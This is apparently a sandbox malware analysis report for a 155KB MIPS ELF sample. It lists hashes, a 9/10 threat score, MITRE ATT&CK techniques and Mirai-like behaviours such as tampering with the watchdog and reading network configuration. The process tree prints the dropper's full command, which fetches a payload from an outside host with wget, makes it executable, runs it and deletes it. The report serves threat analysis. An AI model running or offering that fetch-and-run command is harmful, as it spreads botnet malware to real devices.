1ae813f4f927b728994e9d71b130f2ea4026e8d843acc55a567870eababe3a5a

Analysis

max time kernel
0s
max time network
124s
platform
debian-9_mips
resource
debian9-mipsbe-20221111-en
resource tags

arch:mipsimage:debian9-mipsbe-20221111-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
04-04-2023 23:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7b5a94a08497c282ff959886f97242f3.elf
Size

155KB
MD5

7b5a94a08497c282ff959886f97242f3
SHA1

926fe3a7736bd95aac755c18311c25fde2237ed0
SHA256

1ae813f4f927b728994e9d71b130f2ea4026e8d843acc55a567870eababe3a5a
SHA512

5dbdf7e24b8b7156f03ce6367fe58ddbe58bfe7b554b21ea9d5aaee0f39ff756be8ef74e003ab3504907e685907b4779662c376bd7cef98d91113cdc43bcf44e
SSDEEP

3072:B7esBFP23rWfOB7ZOOyGvWKmrThPaLEne7rNb:1euCloGvrmrThPaLEne7rNb

Score

9^/10

Malware Config

Signatures

Modifies the Watchdog daemon 1 TTPs
Malware like Mirai modify the Watchdog to prevent it restarting an infected system.

Impair Defenses
T1562
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.

Processes:

wget

description ioc process

/etc/hosts /etc/hosts wget
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.

Dynamic Resolution
T1568

Processes:

wget

description ioc process

/etc/resolv.conf /etc/resolv.conf wget
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.

System Network Configuration Discovery
T1016

Processes:

7b5a94a08497c282ff959886f97242f3.elf

description ioc process

/proc/net/route /proc/net/route 7b5a94a08497c282ff959886f97242f3.elf
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery
T1016

Processes:

7b5a94a08497c282ff959886f97242f3.elf

description ioc process

/proc/net/route /proc/net/route 7b5a94a08497c282ff959886f97242f3.elf

description	ioc	process
/etc/hosts	/etc/hosts	wget

description	ioc	process
/etc/resolv.conf	/etc/resolv.conf	wget

description	ioc	process
/proc/net/route	/proc/net/route	7b5a94a08497c282ff959886f97242f3.elf

description	ioc	process
/proc/net/route	/proc/net/route	7b5a94a08497c282ff959886f97242f3.elf

/tmp/7b5a94a08497c282ff959886f97242f3.elf
/tmp/7b5a94a08497c282ff959886f97242f3.elf
1⤵
- Reads system routing table
- Reads system network configuration
PID:324

/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
1⤵
PID:325

/usr/bin/wget
wget -q http://gay.energy/.../vivid -O .....
2⤵
- Modifies hosts file
- Writes DNS configuration
PID:329

/bin/chmod
chmod 777 .....
2⤵
PID:333

./.....
./.....
2⤵
PID:334

/bin/sh
/bin/sh ./.....
2⤵
PID:334

/bin/rm
rm -rf .....
2⤵
PID:336

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads